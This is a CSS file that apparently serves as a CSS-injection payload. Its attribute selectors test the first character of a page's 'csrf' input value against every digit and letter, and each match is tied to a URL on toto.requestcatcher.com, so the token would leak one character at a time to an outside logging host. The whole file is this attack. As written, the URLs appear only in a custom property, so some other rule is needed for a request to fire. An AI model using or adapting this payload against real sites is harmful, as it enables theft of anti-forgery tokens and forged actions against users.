
[name="csrf"][value^="0"] {
    --value: url("https://toto.requestcatcher.com/0")
}

[name="csrf"][value^="1"] {
    --value: url("https://toto.requestcatcher.com/1")
}

[name="csrf"][value^="2"] {
    --value: url("https://toto.requestcatcher.com/2")
}

[name="csrf"][value^="3"] {
    --value: url("https://toto.requestcatcher.com/3")
}

[name="csrf"][value^="4"] {
    --value: url("https://toto.requestcatcher.com/4")
}

[name="csrf"][value^="5"] {
    --value: url("https://toto.requestcatcher.com/5")
}

[name="csrf"][value^="6"] {
    --value: url("https://toto.requestcatcher.com/6")
}

[name="csrf"][value^="7"] {
    --value: url("https://toto.requestcatcher.com/7")
}

[name="csrf"][value^="8"] {
    --value: url("https://toto.requestcatcher.com/8")
}

[name="csrf"][value^="9"] {
    --value: url("https://toto.requestcatcher.com/9")
}

[name="csrf"][value^="a"] {
    --value: url("https://toto.requestcatcher.com/a")
}

[name="csrf"][value^="b"] {
    --value: url("https://toto.requestcatcher.com/b")
}

[name="csrf"][value^="c"] {
    --value: url("https://toto.requestcatcher.com/c")
}

[name="csrf"][value^="d"] {
    --value: url("https://toto.requestcatcher.com/d")
}

[name="csrf"][value^="e"] {
    --value: url("https://toto.requestcatcher.com/e")
}

[name="csrf"][value^="f"] {
    --value: url("https://toto.requestcatcher.com/f")
}

[name="csrf"][value^="g"] {
    --value: url("https://toto.requestcatcher.com/g")
}

[name="csrf"][value^="h"] {
    --value: url("https://toto.requestcatcher.com/h")
}

[name="csrf"][value^="i"] {
    --value: url("https://toto.requestcatcher.com/i")
}

[name="csrf"][value^="j"] {
    --value: url("https://toto.requestcatcher.com/j")
}

[name="csrf"][value^="k"] {
    --value: url("https://toto.requestcatcher.com/k")
}

[name="csrf"][value^="l"] {
    --value: url("https://toto.requestcatcher.com/l")
}

[name="csrf"][value^="m"] {
    --value: url("https://toto.requestcatcher.com/m")
}

[name="csrf"][value^="n"] {
    --value: url("https://toto.requestcatcher.com/n")
}

[name="csrf"][value^="o"] {
    --value: url("https://toto.requestcatcher.com/o")
}

[name="csrf"][value^="p"] {
    --value: url("https://toto.requestcatcher.com/p")
}

[name="csrf"][value^="q"] {
    --value: url("https://toto.requestcatcher.com/q")
}

[name="csrf"][value^="r"] {
    --value: url("https://toto.requestcatcher.com/r")
}

[name="csrf"][value^="s"] {
    --value: url("https://toto.requestcatcher.com/s")
}

[name="csrf"][value^="t"] {
    --value: url("https://toto.requestcatcher.com/t")
}

[name="csrf"][value^="u"] {
    --value: url("https://toto.requestcatcher.com/u")
}

[name="csrf"][value^="v"] {
    --value: url("https://toto.requestcatcher.com/v")
}

[name="csrf"][value^="w"] {
    --value: url("https://toto.requestcatcher.com/w")
}

[name="csrf"][value^="x"] {
    --value: url("https://toto.requestcatcher.com/x")
}

[name="csrf"][value^="y"] {
    --value: url("https://toto.requestcatcher.com/y")
}

[name="csrf"][value^="z"] {
    --value: url("https://toto.requestcatcher.com/z")
}

[name="csrf"][value^="A"] {
    --value: url("https://toto.requestcatcher.com/A")
}

[name="csrf"][value^="B"] {
    --value: url("https://toto.requestcatcher.com/B")
}

[name="csrf"][value^="C"] {
    --value: url("https://toto.requestcatcher.com/C")
}

[name="csrf"][value^="D"] {
    --value: url("https://toto.requestcatcher.com/D")
}

[name="csrf"][value^="E"] {
    --value: url("https://toto.requestcatcher.com/E")
}

[name="csrf"][value^="F"] {
    --value: url("https://toto.requestcatcher.com/F")
}

[name="csrf"][value^="G"] {
    --value: url("https://toto.requestcatcher.com/G")
}

[name="csrf"][value^="H"] {
    --value: url("https://toto.requestcatcher.com/H")
}

[name="csrf"][value^="I"] {
    --value: url("https://toto.requestcatcher.com/I")
}

[name="csrf"][value^="J"] {
    --value: url("https://toto.requestcatcher.com/J")
}

[name="csrf"][value^="K"] {
    --value: url("https://toto.requestcatcher.com/K")
}

[name="csrf"][value^="L"] {
    --value: url("https://toto.requestcatcher.com/L")
}

[name="csrf"][value^="M"] {
    --value: url("https://toto.requestcatcher.com/M")
}

[name="csrf"][value^="N"] {
    --value: url("https://toto.requestcatcher.com/N")
}

[name="csrf"][value^="O"] {
    --value: url("https://toto.requestcatcher.com/O")
}

[name="csrf"][value^="P"] {
    --value: url("https://toto.requestcatcher.com/P")
}

[name="csrf"][value^="Q"] {
    --value: url("https://toto.requestcatcher.com/Q")
}

[name="csrf"][value^="R"] {
    --value: url("https://toto.requestcatcher.com/R")
}

[name="csrf"][value^="S"] {
    --value: url("https://toto.requestcatcher.com/S")
}

[name="csrf"][value^="T"] {
    --value: url("https://toto.requestcatcher.com/T")
}

[name="csrf"][value^="U"] {
    --value: url("https://toto.requestcatcher.com/U")
}

[name="csrf"][value^="V"] {
    --value: url("https://toto.requestcatcher.com/V")
}

[name="csrf"][value^="W"] {
    --value: url("https://toto.requestcatcher.com/W")
}

[name="csrf"][value^="X"] {
    --value: url("https://toto.requestcatcher.com/X")
}

[name="csrf"][value^="Y"] {
    --value: url("https://toto.requestcatcher.com/Y")
}

[name="csrf"][value^="Z"] {
    --value: url("https://toto.requestcatcher.com/Z")
}
